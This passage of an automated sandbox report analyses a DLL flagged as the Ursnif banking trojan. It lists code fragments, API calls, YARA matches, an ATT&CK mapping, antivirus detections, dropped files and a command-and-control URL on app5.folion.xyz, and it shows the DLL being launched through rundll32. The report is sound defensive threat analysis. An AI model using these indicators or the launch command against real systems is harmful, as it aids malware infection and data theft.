Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00F97C20 push ecx; ret	1_2_00F97C29
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00F97F97 push ecx; ret	1_2_00F97FA7
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00F9A169 pushad ; iretd	1_2_00F9A2D9
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00F9B163 push edx; iretd	1_2_00F9B164
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05155B06 push 00000000h; mov dword ptr [esp], ebp	4_2_05155B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05155B06 push edi; mov dword ptr [esp], 00000003h	4_2_05155B69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05155B06 push ebx; mov dword ptr [esp], 00F00000h	4_2_05155B72
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0515810A push ebp; mov dword ptr [esp], FFFF0000h	4_2_05158113
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0515810A push dword ptr [ebp-04h]; mov dword ptr [esp], eax	4_2_05159137
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0515810A push dword ptr [ebp-0Ch]; mov dword ptr [esp], ecx	4_2_051591AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0515810A push dword ptr [ebp-04h]; mov dword ptr [esp], esp	4_2_051591E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0515810A push esi; mov dword ptr [esp], 000FFFFFh	4_2_05159204
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0515810A push 00000000h; mov dword ptr [esp], esi	4_2_05159293
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0137B163 push edx; iretd	4_2_0137B164
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01377F97 push ecx; ret	4_2_01377FA7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01377C20 push ecx; ret	4_2_01377C29

Source: 0f.dll

Static PE information: section name: .code

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_10001F31 LoadLibraryA,GetProcAddress,

1_2_10001F31

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.739535676.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739521647.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739458564.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739502896.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739363916.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.813265596.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739321134.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739404580.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739481698.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5268, type: MEMORYSTR
Source: Yara match	File source: 1.2.loaddll32.exe.38f94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.10000000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.f60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.38f94a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.11f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.1370000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.5bb94a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.a30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.f90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.5bb94a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.706311406.0000000005BB9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.706735766.00000000011F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.809626071.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.813125689.00000000038F9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.810063319.0000000000F60000.00000004.00000001.sdmp, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00F94E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		1_2_00F94E9C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01374E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		4_2_01374E9C

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 5_2_04AF2D03 xor edx, dword ptr fs:[00000030h]

5_2_04AF2D03

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_10001F31 LoadLibraryA,GetProcAddress,

1_2_10001F31

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\0f.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000001.00000002.812552888.0000000001620000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.812702968.00000000033A0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000001.00000002.812552888.0000000001620000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.812702968.00000000033A0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000001.00000002.812552888.0000000001620000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.812702968.00000000033A0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000001.00000002.812552888.0000000001620000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.812702968.00000000033A0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,		1_2_10001566
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,		5_2_10001566

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_00F93946 cpuid

1_2_00F93946

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_1000146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

1_2_1000146C

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_100017A7 SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

1_2_100017A7

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_00F93946 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

1_2_00F93946

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.739535676.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739521647.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739458564.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739502896.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739363916.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.813265596.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739321134.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739404580.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739481698.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5268, type: MEMORYSTR
Source: Yara match	File source: 1.2.loaddll32.exe.38f94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.10000000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.f60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.38f94a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.11f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.1370000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.5bb94a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.a30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.f90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.5bb94a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.706311406.0000000005BB9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.706735766.00000000011F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.809626071.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.813125689.00000000038F9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.810063319.0000000000F60000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.739535676.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739521647.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739458564.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739502896.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739363916.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.813265596.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739321134.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739404580.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739481698.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5268, type: MEMORYSTR
Source: Yara match	File source: 1.2.loaddll32.exe.38f94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.10000000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.f60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.38f94a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.11f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.1370000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.5bb94a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.a30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.f90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.5bb94a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.706311406.0000000005BB9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.706735766.00000000011F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.809626071.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.813125689.00000000038F9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.810063319.0000000000F60000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	Path Interception	Process Injection12	Masquerading1	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Archive Collected Data11	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Account Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	System Owner/User Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery34	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
0f.dll	24%	Metadefender		Browse
0f.dll	79%	ReversingLabs	Win32.Trojan.GenericML
0f.dll	100%	Avira	TR/AD.Ursnif.uxgkb
0f.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.loaddll32.exe.f90000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
4.2.rundll32.exe.5150000.2.unpack	100%	Avira	HEUR/AGEN.1142655	Download File
5.2.rundll32.exe.10000000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
4.2.rundll32.exe.1370000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
5.2.rundll32.exe.4af0000.1.unpack	100%	Avira	HEUR/AGEN.1142655	Download File
1.2.loaddll32.exe.2e90000.2.unpack	100%	Avira	HEUR/AGEN.1142655	Download File
1.2.loaddll32.exe.10000000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.wikipedia.com/	0%	URL Reputation	safe
http://app5.folion.xyz/C6VmqHmn62rFCww6y4ysR/P0nI5lbrE_2FoyZm/BDBmvveWjO3LK9Q/55XxQq6CmCPdNvBaEz/m5n	0%	Avira URL Cloud	safe
http://app5.folion.xyz	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
windowsupdate.s.llnwi.net	178.79.242.128	true	false		unknown
app5.folion.xyz	unknown	unknown	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.wikipedia.com/	msapplication.xml6.19.dr	false	URL Reputation: safe	unknown
http://www.amazon.com/	msapplication.xml.19.dr	false		high
http://app5.folion.xyz/C6VmqHmn62rFCww6y4ysR/P0nI5lbrE_2FoyZm/BDBmvveWjO3LK9Q/55XxQq6CmCPdNvBaEz/m5n	{C5D724C3-27C1-11EC-90E9-ECF4BB862DED}.dat.19.dr	false	Avira URL Cloud: safe	unknown
http://www.nytimes.com/	msapplication.xml3.19.dr	false		high
http://www.live.com/	msapplication.xml2.19.dr	false		high
http://app5.folion.xyz	loaddll32.exe, 00000001.00000002.810736280.000000000119B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reddit.com/	msapplication.xml4.19.dr	false		high
http://www.twitter.com/	msapplication.xml5.19.dr	false		high
http://www.youtube.com/	msapplication.xml7.19.dr	false		high
http://www.google.com/	msapplication.xml1.19.dr	false		high

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	498857
Start date:	07.10.2021
Start time:	15:51:49
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	0f.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.winDLL@10/19@3/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 61.2% (good quality ratio 59.3%) Quality average: 80.6% Quality standard deviation: 27.3%
HCA Information:	Successful, ratio: 59% Number of executed functions: 63 Number of non-executed functions: 69
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 95.100.218.79, 2.20.178.10, 2.20.178.56, 20.199.120.85, 20.199.120.182, 20.82.209.183, 20.199.120.151, 2.20.178.24, 2.20.178.33, 104.94.89.6, 152.199.19.161, 20.54.110.249 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, ie9comview.vo.msecnd.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net Not all processes where analyzed, report is missing behavior information VT rate limit hit for: /opt/package/joesandbox/database/analysis/498857/sample/0f.dll

Simulations

Behavior and APIs

Time	Type	Description
15:55:54	API Interceptor	1x Sleep call for process: loaddll32.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
windowsupdate.s.llnwi.net	KVx62u3gsv.exe	Get hash	malicious	Browse	178.79.242.128
	rKQTea8DKe.exe	Get hash	malicious	Browse	178.79.242.0
	NESMA RFQ EQUIPMENTS AND DOCUMENTS REQUIRED.doc	Get hash	malicious	Browse	178.79.242.128
	6dfce00750c09d7a9927dab4bed6b81a4043fab36fba5.exe	Get hash	malicious	Browse	178.79.242.128
	GT09876545678.exe	Get hash	malicious	Browse	178.79.242.0
	REVISED PI 7-10-2021.xlsx	Get hash	malicious	Browse	178.79.242.128
	FACTURA.exe	Get hash	malicious	Browse	178.79.242.128
	uNCouz6hx8.exe	Get hash	malicious	Browse	178.79.242.0
	cBPH5n4T38.exe	Get hash	malicious	Browse	178.79.242.0
	DcF5xuhMNO.exe	Get hash	malicious	Browse	178.79.242.0
	BSQ4wRQciB.dll	Get hash	malicious	Browse	178.79.242.128
	Factura Pendiente.exe	Get hash	malicious	Browse	178.79.242.128
	nEwkr1dC74.exe	Get hash	malicious	Browse	178.79.242.0
	uN85v8VI8X.exe	Get hash	malicious	Browse	178.79.242.128
	OXkB3xMeAr.exe	Get hash	malicious	Browse	178.79.242.128
	new price quote inquiry FOB sgz67889 dfx46667.exe	Get hash	malicious	Browse	178.79.242.0
	IokJ1Ttx1O.dll	Get hash	malicious	Browse	178.79.242.0
	eZCQoOpWRX.exe	Get hash	malicious	Browse	178.79.242.0
	x1Y6mEs1uM.dll	Get hash	malicious	Browse	178.79.242.0
	DeqrIfxzHW.exe	Get hash	malicious	Browse	178.79.242.0

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{C5D724C1-27C1-11EC-90E9-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7726504473662315
Encrypted:	false
SSDEEP:	96:rlZyZqS2qwVWqwi35ytqwi35pRSfqwi35pXR0xMqwi3D9pXjDqw33D9pXAB:rlZyZN2vWBtWSfu0xMeDOB
MD5:	94F9B5C28E9B149EB46ADF9F2AEF671C
SHA1:	D980F86F0CB9D559D4511FE48DF6DC551FA7EE8E
SHA-256:	18C6860293D7ED805DAE18A5C77E6B816ECF9C7952B6588E2E5278CCA7E9B7BB
SHA-512:	BC178D27576935281ED3E3F4F6EB34D4E3E843AFCC54569766CB5A97189B3E2FC9CB8FFD5C63EE6D437F41F2F1AC71360BFAA5CC670A62B144A8EFFC9E3B4872
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{C5D724C3-27C1-11EC-90E9-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28124
Entropy (8bit):	1.9114461517774022
Encrypted:	false
SSDEEP:	192:rUrZmmQhn6P7kcjB2NWIMc9Rh8CVslgh8CVcA:rU9mzh6PAOwktYRh8CVQgh8CVX
MD5:	AEB3A15AEDBCF9FB5FA5B95E2DEB6649
SHA1:	ECFA0B9E79EE11ACA8CB3E5D5A3650CEC7471C19
SHA-256:	0FD03A33686DDBC1905354E97A0449F8E2937910F7C545F13F55FDBA1F0D5099
SHA-512:	C2AC69F2D0EC27A8353FA1E60B4C4AE96EC0812CB3A2E2CEE7C57B9E7AFF420D7B781B1DBAD33A2CD6CD26EC83B318EFA79CC4855D69D13D5B6BC9788BCB739F
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.107543499804657
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEWCnWimI002EtM3MHdNMNxOEWCnWimI00ObVbkEtMb:2d6NxOWSZHKd6NxOWSZ76b
MD5:	DC395B2AEFBEDD9A677BD175271E1437
SHA1:	878FD1F33DF98EF507658F2A95279CC4ED1B7539
SHA-256:	9FDD3722C364EE0FB6936FA96D61709E1C800150A8C22B43760D1D0250D1181B
SHA-512:	941CC2033EB271DFC340CFB7C936F425B4B9293F79FAA99DD7584B4090FF78BB301878AEF6978003F7E045D75546E42E357AE102C84724C67D1A51D805427644
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x9b4f4795,0x01d7bbce</date><accdate>0x9b4f4795,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x9b4f4795,0x01d7bbce</date><accdate>0x9b4f4795,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.145246967420208
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2kL8ijnWimI002EtM3MHdNMNxe2kL8ijnWimI00Obkak6EtMb:2d6NxrGzjSZHKd6NxrGzjSZ7Aa7b
MD5:	B75797E660E655043C9F8ABB4B4D25B6
SHA1:	E726052E9AB9C4C81B05049B04E399017A0C512E
SHA-256:	D6477BBF5E39AA393F596BBD590C2977F5652E08AF0C78F557E8CC788CF13858
SHA-512:	185AF0953A8DBFAF81564B0411908AAAB8E3FB9D73C09573541B2B87BC1366628493A7BA632A9861BC788132DFCAE4ADF7D87F6ADE2D3A737AEDACEB768E8E68
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x9b482054,0x01d7bbce</date><accdate>0x9b482054,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x9b482054,0x01d7bbce</date><accdate>0x9b482054,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
